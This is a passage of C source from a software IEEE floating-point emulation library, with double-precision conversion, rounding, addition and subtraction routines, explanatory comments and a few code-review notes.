the double-precision floating-point value +| `a' to the 32-bit two's complement integer format. 
The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode. If `a' is a NaN, the largest
| positive integer is returned. Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int32 float64_to_int32( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, shiftCount;
    uint64_t aSig;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    /* NaN: force the sign positive so the largest positive integer results.  */
    if ( ( aExp == 0x7FF ) && aSig ) aSign = 0;
    if ( aExp ) aSig |= LIT64( 0x0010000000000000 );
    shiftCount = 0x42C - aExp;
    if ( 0 < shiftCount ) shift64RightJamming( aSig, shiftCount, &aSig );
    return roundAndPackInt32( aSign, aSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the double-precision floating-point value
| `a' to the 32-bit two's complement integer format. The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned. Otherwise, if
| the conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int32 float64_to_int32_round_to_zero( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, shiftCount;
    uint64_t aSig, savedASig;
    int32_t z;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    /* Magnitude >= 2^31 (or NaN): overflow.  */
    if ( 0x41E < aExp ) {
        if ( ( aExp == 0x7FF ) && aSig ) aSign = 0;
        goto invalid;
    }
    /* Magnitude < 1: truncates to zero, inexact unless exactly zero.  */
    else if ( aExp < 0x3FF ) {
        if ( aExp || aSig ) STATUS(float_exception_flags) |= float_flag_inexact;
        return 0;
    }
    aSig |= LIT64( 0x0010000000000000 );
    shiftCount = 0x433 - aExp;
    savedASig = aSig;
    aSig >>= shiftCount;
    z = (int32_t)aSig;
    /* Avoid negating INT32_MIN (undefined behaviour on two's complement).  */
    if ( aSign && (z != 0x80000000)) z = - z;
    if ( ( z < 0 ) ^ aSign ) {
 invalid:
        float_raise( float_flag_invalid STATUS_VAR);
        return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF;
    }
    /* Any bits shifted out mean the truncation was inexact.  */
    if ( ( aSig<<shiftCount ) != savedASig ) {
        STATUS(float_exception_flags) |= float_flag_inexact;
    }
    return z;

}

/*----------------------------------------------------------------------------
| Returns the result of converting the double-precision floating-point value
| `a' to the 16-bit two's complement integer format. The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned. Otherwise, if
| the conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int_fast16_t float64_to_int16_round_to_zero(float64 a STATUS_PARAM)
{
    flag aSign;
    int_fast16_t aExp, shiftCount;
    uint64_t aSig, savedASig;
    int32 z;

    /* NOTE(review): unlike the other float64 conversions, this one does not
     * squash input denormals first -- presumably deliberate; confirm against
     * the callers' expectations.  */
    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    /* Magnitude >= 2^15 (or NaN): overflow.  */
    if ( 0x40E < aExp ) {
        if ( ( aExp == 0x7FF ) && aSig ) {
            aSign = 0;
        }
        goto invalid;
    }
    /* Magnitude < 1: truncates to zero, inexact unless exactly zero.  */
    else if ( aExp < 0x3FF ) {
        if ( aExp || aSig ) {
            STATUS(float_exception_flags) |= float_flag_inexact;
        }
        return 0;
    }
    aSig |= LIT64( 0x0010000000000000 );
    shiftCount = 0x433 - aExp;
    savedASig = aSig;
    aSig >>= shiftCount;
    z = (int32)aSig;
    if ( aSign ) {
        z = - z;
    }
    if ( ( (int16_t)z < 0 ) ^ aSign ) {
 invalid:
        float_raise( float_flag_invalid STATUS_VAR);
        return aSign ? (int32_t) 0xffff8000 : 0x7FFF;
    }
    /* Any bits shifted out mean the truncation was inexact.  */
    if ( ( aSig<<shiftCount ) != savedASig ) {
        STATUS(float_exception_flags) |= float_flag_inexact;
    }
    return z;
}

/*----------------------------------------------------------------------------
| Returns the result of converting the double-precision floating-point value
| `a' to the 64-bit two's complement integer format. The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode. If `a' is a NaN, the largest
| positive integer is returned. Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int64 float64_to_int64( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, shiftCount;
    uint64_t aSig, aSigExtra;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    if ( aExp ) aSig |= LIT64( 0x0010000000000000 );
    shiftCount = 0x433 - aExp;
    if ( shiftCount <= 0 ) {
        /* Magnitude >= 2^63 or NaN: saturate (only -2^63 itself is valid).  */
        if ( 0x43E < aExp ) {
            float_raise( float_flag_invalid STATUS_VAR);
            if ( ! aSign
                 || ( ( aExp == 0x7FF )
                      && ( aSig != LIT64( 0x0010000000000000 ) ) )
               ) {
                return LIT64( 0x7FFFFFFFFFFFFFFF );
            }
            return (int64_t) LIT64( 0x8000000000000000 );
        }
        aSigExtra = 0;
        aSig <<= - shiftCount;
    }
    else {
        shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra );
    }
    return roundAndPackInt64( aSign, aSig, aSigExtra STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the double-precision floating-point value
| `a' to the 64-bit two's complement integer format. The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned. Otherwise, if
| the conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int64 float64_to_int64_round_to_zero( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, shiftCount;
    uint64_t aSig;
    int64 z;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    if ( aExp ) aSig |= LIT64( 0x0010000000000000 );
    shiftCount = aExp - 0x433;
    if ( 0 <= shiftCount ) {
        if ( 0x43E <= aExp ) {
            /* 0xC3E0000000000000 is exactly -2^63, the one in-range value
             * this large; everything else saturates with invalid.  */
            if ( float64_val(a) != LIT64( 0xC3E0000000000000 ) ) {
                float_raise( float_flag_invalid STATUS_VAR);
                if ( ! aSign
                     || ( ( aExp == 0x7FF )
                          && ( aSig != LIT64( 0x0010000000000000 ) ) )
                   ) {
                    return LIT64( 0x7FFFFFFFFFFFFFFF );
                }
            }
            return (int64_t) LIT64( 0x8000000000000000 );
        }
        z = aSig<<shiftCount;
    }
    else {
        /* Magnitude < 1/2: truncates to zero.  */
        if ( aExp < 0x3FE ) {
            if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact;
            return 0;
        }
        z = aSig>>( - shiftCount );
        /* Any bits shifted out mean the truncation was inexact.  */
        if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) {
            STATUS(float_exception_flags) |= float_flag_inexact;
        }
    }
    if ( aSign ) z = - z;
    return z;

}

/*----------------------------------------------------------------------------
| Returns the result of converting the double-precision floating-point value
| `a' to the single-precision floating-point format. The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

float32 float64_to_float32( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp;
    uint64_t aSig;
    uint32_t zSig;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    if ( aExp == 0x7FF ) {
        /* NaN converts via the canonical-NaN helpers; Inf stays Inf.  */
        if ( aSig ) return commonNaNToFloat32( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR );
        return packFloat32( aSign, 0xFF, 0 );
    }
    /* Narrow the 52-bit fraction to fit float32 rounding, keeping a
     * sticky bit for the discarded low bits.  */
    shift64RightJamming( aSig, 22, &aSig );
    zSig = (uint32_t)aSig;
    if ( aExp || zSig ) {
        zSig |= 0x40000000;
        aExp -= 0x381;   /* rebias 1023 -> 127 (with the format offset) */
    }
    return roundAndPackFloat32( aSign, aExp, zSig STATUS_VAR );

}


/*----------------------------------------------------------------------------
| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a
| half-precision floating-point value, returning the result. After being
| shifted into the proper positions, the three fields are simply added
| together to form the result. This means that any integer portion of `zSig'
| will be added into the exponent. Since a properly normalized significand
| will have an integer portion equal to 1, the `zExp' input should be 1 less
| than the desired result exponent whenever `zSig' is a complete, normalized
| significand.
*----------------------------------------------------------------------------*/
static float16 packFloat16(flag zSign, int_fast16_t zExp, uint16_t zSig)
{
    return make_float16(
        (((uint32_t)zSign) << 15) + (((uint32_t)zExp) << 10) + zSig);
}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and significand `zSig', and returns the proper half-precision floating-
| point value corresponding to the abstract input. Ordinarily, the abstract
| value is simply rounded and packed into the half-precision format, with
| the inexact exception raised if the abstract input cannot be represented
| exactly. However, if the abstract value is too large, the overflow and
| inexact exceptions are raised and an infinity or maximal finite value is
| returned. If the abstract value is too small, the input value is rounded to
| a subnormal number, and the underflow and inexact exceptions are raised if
| the abstract input cannot be represented exactly as a subnormal half-
| precision floating-point number.
| The `ieee' flag indicates whether to use IEEE standard half precision, or
| ARM-style "alternative representation", which omits the NaN and Inf
| encodings in order to raise the maximum representable exponent by one.
| The input significand `zSig' has its binary point between bits 22
| and 23, which is 13 bits to the left of the usual location. This shifted
| significand must be normalized or smaller. If `zSig' is not normalized,
| `zExp' must be 0; in that case, the result returned is a subnormal number,
| and it must not require rounding. In the usual case that `zSig' is
| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent.
| Note the slightly odd position of the binary point in zSig compared with the
| other roundAndPackFloat functions. This should probably be fixed if we
| need to implement more float16 routines than just conversion.
| The handling of underflow and overflow follows the IEC/IEEE Standard for
| Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

/* NOTE(review): declared to return float32 although every return statement
 * produces a packFloat16() value and all callers treat the result as a
 * float16 bit pattern -- presumably works because the softfloat types are
 * plain integer typedefs here; confirm, and consider changing the return
 * type to float16.  */
static float32 roundAndPackFloat16(flag zSign, int_fast16_t zExp,
                                   uint32_t zSig, flag ieee STATUS_PARAM)
{
    int maxexp = ieee ? 29 : 30;
    uint32_t mask;
    uint32_t increment;
    bool rounding_bumps_exp;
    bool is_tiny = false;

    /* Calculate the mask of bits of the mantissa which are not
     * representable in half-precision and will be lost.
     */
    if (zExp < 1) {
        /* Will be denormal in halfprec */
        mask = 0x00ffffff;
        if (zExp >= -11) {
            mask >>= 11 + zExp;
        }
    } else {
        /* Normal number in halfprec */
        mask = 0x00001fff;
    }

    switch (STATUS(float_rounding_mode)) {
    case float_round_nearest_even:
        increment = (mask + 1) >> 1;
        /* Exactly-half case rounds to even: round up only if the bit
         * above the discarded part is set.  */
        if ((zSig & mask) == increment) {
            increment = zSig & (increment << 1);
        }
        break;
    case float_round_ties_away:
        increment = (mask + 1) >> 1;
        break;
    case float_round_up:
        increment = zSign ? 0 : mask;
        break;
    case float_round_down:
        increment = zSign ? mask : 0;
        break;
    default: /* round_to_zero */
        increment = 0;
        break;
    }

    rounding_bumps_exp = (zSig + increment >= 0x01000000);

    if (zExp > maxexp || (zExp == maxexp && rounding_bumps_exp)) {
        if (ieee) {
            float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR);
            return packFloat16(zSign, 0x1f, 0);
        } else {
            /* ARM alternative format has no Inf: overflow is invalid and
             * yields the maximal finite value.  */
            float_raise(float_flag_invalid STATUS_VAR);
            return packFloat16(zSign, 0x1f, 0x3ff);
        }
    }

    if (zExp < 0) {
        /* Note that flush-to-zero does not affect half-precision results */
        is_tiny =
            (STATUS(float_detect_tininess) == float_tininess_before_rounding)
            || (zExp < -1)
            || (!rounding_bumps_exp);
    }
    if (zSig & mask) {
        float_raise(float_flag_inexact STATUS_VAR);
        if (is_tiny) {
            float_raise(float_flag_underflow STATUS_VAR);
        }
    }

    zSig += increment;
    if (rounding_bumps_exp) {
        zSig >>= 1;
        zExp++;
    }

    if (zExp < -10) {
        /* Too small even for a half-precision subnormal: signed zero.  */
        return packFloat16(zSign, 0, 0);
    }
    if (zExp < 0) {
        zSig >>= -zExp;
        zExp = 0;
    }
    return packFloat16(zSign, zExp, zSig >> 13);
}

/* Normalize a nonzero half-precision subnormal significand, returning the
 * shifted significand and the corresponding (possibly negative) exponent.  */
static void normalizeFloat16Subnormal(uint32_t aSig, int_fast16_t *zExpPtr,
                                      uint32_t *zSigPtr)
{
    int8_t shiftCount = countLeadingZeros32(aSig) - 21;
    *zSigPtr = aSig << shiftCount;
    *zExpPtr = 1 - shiftCount;
}

/* Half precision floats come in two formats: standard IEEE and "ARM" format.
   The latter gains extra exponent range by omitting the NaN/Inf encodings. */

float32 float16_to_float32(float16 a, flag ieee STATUS_PARAM)
{
    flag aSign;
    int_fast16_t aExp;
    uint32_t aSig;

    aSign = extractFloat16Sign(a);
    aExp = extractFloat16Exp(a);
    aSig = extractFloat16Frac(a);

    /* Exponent 0x1f encodes NaN/Inf only in IEEE format.  */
    if (aExp == 0x1f && ieee) {
        if (aSig) {
            return commonNaNToFloat32(float16ToCommonNaN(a STATUS_VAR) STATUS_VAR);
        }
        return packFloat32(aSign, 0xff, 0);
    }
    if (aExp == 0) {
        if (aSig == 0) {
            return packFloat32(aSign, 0, 0);
        }

        /* Half-precision subnormals are normal in float32.  */
        normalizeFloat16Subnormal(aSig, &aExp, &aSig);
        aExp--;
    }
    /* Rebias exponent (15 -> 127) and widen the 10-bit fraction to 23.  */
    return packFloat32( aSign, aExp + 0x70, aSig << 13);
}

float16 float32_to_float16(float32 a, flag ieee STATUS_PARAM)
{
    flag aSign;
    int_fast16_t aExp;
    uint32_t aSig;

    a = float32_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat32Frac( a );
    aExp = extractFloat32Exp( a );
    aSign = extractFloat32Sign( a );
    if ( aExp == 0xFF ) {
        if (aSig) {
            /* Input is a NaN */
            if (!ieee) {
                /* ARM alternative format cannot represent NaN.  */
                float_raise(float_flag_invalid STATUS_VAR);
                return packFloat16(aSign, 0, 0);
            }
            return commonNaNToFloat16(
                float32ToCommonNaN(a STATUS_VAR) STATUS_VAR);
        }
        /* Infinity */
        if (!ieee) {
            /* ARM alternative format cannot represent Inf either.  */
            float_raise(float_flag_invalid STATUS_VAR);
            return packFloat16(aSign, 0x1f, 0x3ff);
        }
        return packFloat16(aSign, 0x1f, 0);
    }
    if (aExp == 0 && aSig == 0) {
        return packFloat16(aSign, 0, 0);
    }
    /* Decimal point between bits 22 and 23. Note that we add the 1 bit
     * even if the input is denormal; however this is harmless because
     * the largest possible single-precision denormal is still smaller
     * than the smallest representable half-precision denormal, and so we
     * will end up ignoring aSig and returning via the "always return zero"
     * codepath.
     */
    aSig |= 0x00800000;
    aExp -= 0x71;

    return roundAndPackFloat16(aSign, aExp, aSig, ieee STATUS_VAR);
}

float64 float16_to_float64(float16 a, flag ieee STATUS_PARAM)
{
    flag aSign;
    int_fast16_t aExp;
    uint32_t aSig;

    aSign = extractFloat16Sign(a);
    aExp = extractFloat16Exp(a);
    aSig = extractFloat16Frac(a);

    /* Exponent 0x1f encodes NaN/Inf only in IEEE format.  */
    if (aExp == 0x1f && ieee) {
        if (aSig) {
            return commonNaNToFloat64(
                float16ToCommonNaN(a STATUS_VAR) STATUS_VAR);
        }
        return packFloat64(aSign, 0x7ff, 0);
    }
    if (aExp == 0) {
        if (aSig == 0) {
            return packFloat64(aSign, 0, 0);
        }

        /* Half-precision subnormals are normal in float64.  */
        normalizeFloat16Subnormal(aSig, &aExp, &aSig);
        aExp--;
    }
    /* Rebias exponent (15 -> 1023) and widen the 10-bit fraction to 52.  */
    return packFloat64(aSign, aExp + 0x3f0, ((uint64_t)aSig) << 42);
}

float16 float64_to_float16(float64 a, flag ieee STATUS_PARAM)
{
    flag aSign;
    int_fast16_t aExp;
    uint64_t aSig;
    uint32_t zSig;

    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac(a);
    aExp = extractFloat64Exp(a);
    aSign = extractFloat64Sign(a);
    if (aExp == 0x7FF) {
        if (aSig) {
            /* Input is a NaN */
            if (!ieee) {
                float_raise(float_flag_invalid STATUS_VAR);
                return packFloat16(aSign, 0, 0);
            }
            return commonNaNToFloat16(
                float64ToCommonNaN(a STATUS_VAR) STATUS_VAR);
        }
        /* Infinity */
        if (!ieee) {
            float_raise(float_flag_invalid STATUS_VAR);
            return packFloat16(aSign, 0x1f, 0x3ff);
        }
        return packFloat16(aSign, 0x1f, 0);
    }
    shift64RightJamming(aSig, 29, &aSig);
    zSig = (uint32_t)aSig;
    if (aExp == 0 && zSig == 0) {
        return packFloat16(aSign, 0, 0);
    }
    /* Decimal point between bits 22 and 23. Note that we add the 1 bit
     * even if the input is denormal; however this is harmless because
     * the largest possible single-precision denormal is still smaller
     * than the smallest representable half-precision denormal, and so we
     * will end up ignoring aSig and returning via the "always return zero"
     * codepath.
+ */ + zSig |= 0x00800000; + aExp -= 0x3F1; + + return roundAndPackFloat16(aSign, aExp, zSig, ieee STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 float64_to_floatx80( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig; + + a = float64_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return commonNaNToFloatx80( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + return + packFloatx80( + aSign, aExp + 0x3C00, ( aSig | LIT64( 0x0010000000000000 ) )<<11 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the quadruple-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 float64_to_float128( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig, zSig0, zSig1; + + a = float64_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return commonNaNToFloat128( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat128( aSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + shift128Right( aSig, 0, 4, &zSig0, &zSig1 ); + return packFloat128( aSign, aExp + 0x3C00, zSig0, zSig1 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the double-precision floating-point value `a' to an integer, and +| returns the result as a double-precision floating-point value. The +| operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
*----------------------------------------------------------------------------*/

float64 float64_round_to_int( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp;
    uint64_t lastBitMask, roundBitsMask;
    uint64_t z;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aExp = extractFloat64Exp( a );
    /* 0x433 = 0x3FF + 52: at this exponent and above the 52-bit fraction
     * holds no bits below the binary point, so `a' is already integral
     * (only a NaN needs further handling).
     */
    if ( 0x433 <= aExp ) {
        if ( ( aExp == 0x7FF ) && extractFloat64Frac( a ) ) {
            return propagateFloat64NaN( a, a STATUS_VAR );
        }
        return a;
    }
    /* |a| < 1: the result is 0 or +/-1 depending on the rounding mode. */
    if ( aExp < 0x3FF ) {
        if ( (uint64_t) ( float64_val(a)<<1 ) == 0 ) return a;
        STATUS(float_exception_flags) |= float_flag_inexact;
        aSign = extractFloat64Sign( a );
        switch ( STATUS(float_rounding_mode) ) {
         case float_round_nearest_even:
            /* aExp == 0x3FE with a nonzero frac means 0.5 < |a| < 1 */
            if ( ( aExp == 0x3FE ) && extractFloat64Frac( a ) ) {
                return packFloat64( aSign, 0x3FF, 0 );
            }
            break;
        case float_round_ties_away:
            /* |a| >= 0.5 rounds away from zero to +/-1 */
            if (aExp == 0x3FE) {
                return packFloat64(aSign, 0x3ff, 0);
            }
            break;
         case float_round_down:
            return make_float64(aSign ? LIT64( 0xBFF0000000000000 ) : 0);
         case float_round_up:
            return make_float64(
            aSign ? LIT64( 0x8000000000000000 ) : LIT64( 0x3FF0000000000000 ));
        }
        return packFloat64( aSign, 0, 0 );
    }
    /* General case: mask off the fraction bits below the binary point and
     * round by integer arithmetic directly on the encoding.
     */
    lastBitMask = 1;
    lastBitMask <<= 0x433 - aExp;
    roundBitsMask = lastBitMask - 1;
    z = float64_val(a);
    switch (STATUS(float_rounding_mode)) {
    case float_round_nearest_even:
        z += lastBitMask >> 1;
        if ((z & roundBitsMask) == 0) {
            /* Exactly halfway: clear the last kept bit (round to even) */
            z &= ~lastBitMask;
        }
        break;
    case float_round_ties_away:
        z += lastBitMask >> 1;
        break;
    case float_round_to_zero:
        break;
    case float_round_up:
        if (!extractFloat64Sign(make_float64(z))) {
            z += roundBitsMask;
        }
        break;
    case float_round_down:
        if (extractFloat64Sign(make_float64(z))) {
            z += roundBitsMask;
        }
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    z &= ~ roundBitsMask;
    if ( z != float64_val(a) )
        STATUS(float_exception_flags) |= float_flag_inexact;
    return make_float64(z);

}

/* Round `a' toward zero to an integral value, by temporarily forcing the
 * rounding mode to round_to_zero around float64_round_to_int().
 */
float64 float64_trunc_to_int( float64 a STATUS_PARAM)
{
    int oldmode;
    float64 res;
    oldmode = STATUS(float_rounding_mode);
    STATUS(float_rounding_mode) = float_round_to_zero;
    res = float64_round_to_int(a STATUS_VAR);
    STATUS(float_rounding_mode) = oldmode;
    return res;
}

/*----------------------------------------------------------------------------
| Returns the result of adding the absolute values of the double-precision
| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated
| before being returned. `zSign' is ignored if the result is a NaN.
| The addition is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float64 addFloat64Sigs( float64 a, float64 b, flag zSign STATUS_PARAM )
{
    int_fast16_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig;
    int_fast16_t expDiff;

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    bSig = extractFloat64Frac( b );
    bExp = extractFloat64Exp( b );
    expDiff = aExp - bExp;
    /* Pre-shift left by 9 so the implicit bit (OR'ed in below as
     * 0x2000000000000000) sits at bit 61, leaving headroom for the carry
     * out of the addition.
     */
    aSig <<= 9;
    bSig <<= 9;
    if ( 0 < expDiff ) {
        /* a has the larger exponent: align b to a */
        if ( aExp == 0x7FF ) {
            if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR );
            return a;
        }
        if ( bExp == 0 ) {
            /* b subnormal: it has no implicit bit, so shift one less */
            --expDiff;
        }
        else {
            bSig |= LIT64( 0x2000000000000000 );
        }
        shift64RightJamming( bSig, expDiff, &bSig );
        zExp = aExp;
    }
    else if ( expDiff < 0 ) {
        /* b has the larger exponent: align a to b */
        if ( bExp == 0x7FF ) {
            if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
            return packFloat64( zSign, 0x7FF, 0 );
        }
        if ( aExp == 0 ) {
            ++expDiff;
        }
        else {
            aSig |= LIT64( 0x2000000000000000 );
        }
        shift64RightJamming( aSig, - expDiff, &aSig );
        zExp = bExp;
    }
    else {
        /* Equal exponents: the sum cannot need normalization shifting */
        if ( aExp == 0x7FF ) {
            if ( aSig | bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
            return a;
        }
        if ( aExp == 0 ) {
            /* Both subnormal (or zero): the sum is exact */
            if (STATUS(flush_to_zero)) {
                if (aSig | bSig) {
                    float_raise(float_flag_output_denormal STATUS_VAR);
                }
                return packFloat64(zSign, 0, 0);
            }
            return packFloat64( zSign, 0, ( aSig + bSig )>>9 );
        }
        /* 0x4000000000000000 accounts for both implicit bits at once */
        zSig = LIT64( 0x4000000000000000 ) + aSig + bSig;
        zExp = aExp;
        goto roundAndPack;
    }
    aSig |= LIT64( 0x2000000000000000 );
    /* Tentatively shift left one; undo if the sum carried into bit 63 */
    zSig = ( aSig + bSig )<<1;
    --zExp;
    if ( (int64_t) zSig < 0 ) {
        zSig = aSig + bSig;
        ++zExp;
    }
 roundAndPack:
    return roundAndPackFloat64( zSign, zExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of subtracting the absolute values of the double-
| precision floating-point values `a' and `b'. If `zSign' is 1, the
| difference is negated before being returned.
`zSign' is ignored if the
| result is a NaN. The subtraction is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float64 subFloat64Sigs( float64 a, float64 b, flag zSign STATUS_PARAM )
{
    int_fast16_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig;
    int_fast16_t expDiff;

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    bSig = extractFloat64Frac( b );
    bExp = extractFloat64Exp( b );
    expDiff = aExp - bExp;
    /* Pre-shift left by 10 so the implicit bit (0x4000000000000000) sits
     * at bit 62; the difference of two such values cannot go negative in
     * magnitude terms once the larger operand is known.
     */
    aSig <<= 10;
    bSig <<= 10;
    if ( 0 < expDiff ) goto aExpBigger;
    if ( expDiff < 0 ) goto bExpBigger;
    /* Equal exponents */
    if ( aExp == 0x7FF ) {
        if ( aSig | bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        /* Inf - Inf is invalid */
        float_raise( float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }
    if ( aExp == 0 ) {
        aExp = 1;
        bExp = 1;
    }
    if ( bSig < aSig ) goto aBigger;
    if ( aSig < bSig ) goto bBigger;
    /* Exact cancellation: the zero result is negative only in
     * round-down mode (IEC/IEEE sign rule for x - x).
     */
    return packFloat64( STATUS(float_rounding_mode) == float_round_down, 0, 0 );
 bExpBigger:
    if ( bExp == 0x7FF ) {
        if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        return packFloat64( zSign ^ 1, 0x7FF, 0 );
    }
    if ( aExp == 0 ) {
        /* a subnormal: no implicit bit, so shift one less */
        ++expDiff;
    }
    else {
        aSig |= LIT64( 0x4000000000000000 );
    }
    shift64RightJamming( aSig, - expDiff, &aSig );
    bSig |= LIT64( 0x4000000000000000 );
 bBigger:
    zSig = bSig - aSig;
    zExp = bExp;
    zSign ^= 1;
    goto normalizeRoundAndPack;
 aExpBigger:
    if ( aExp == 0x7FF ) {
        if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        return a;
    }
    if ( bExp == 0 ) {
        --expDiff;
    }
    else {
        bSig |= LIT64( 0x4000000000000000 );
    }
    shift64RightJamming( bSig, expDiff, &bSig );
    aSig |= LIT64( 0x4000000000000000 );
 aBigger:
    zSig = aSig - bSig;
    zExp = aExp;
 normalizeRoundAndPack:
    --zExp;
    return normalizeRoundAndPackFloat64( zSign, zExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
|
Returns the result of adding the double-precision floating-point values `a' +| and `b'. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_add( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + if ( aSign == bSign ) { + return addFloat64Sigs( a, b, aSign STATUS_VAR ); + } + else { + return subFloat64Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the double-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_sub( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + if ( aSign == bSign ) { + return subFloat64Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat64Sigs( a, b, aSign STATUS_VAR ); + } + +} + 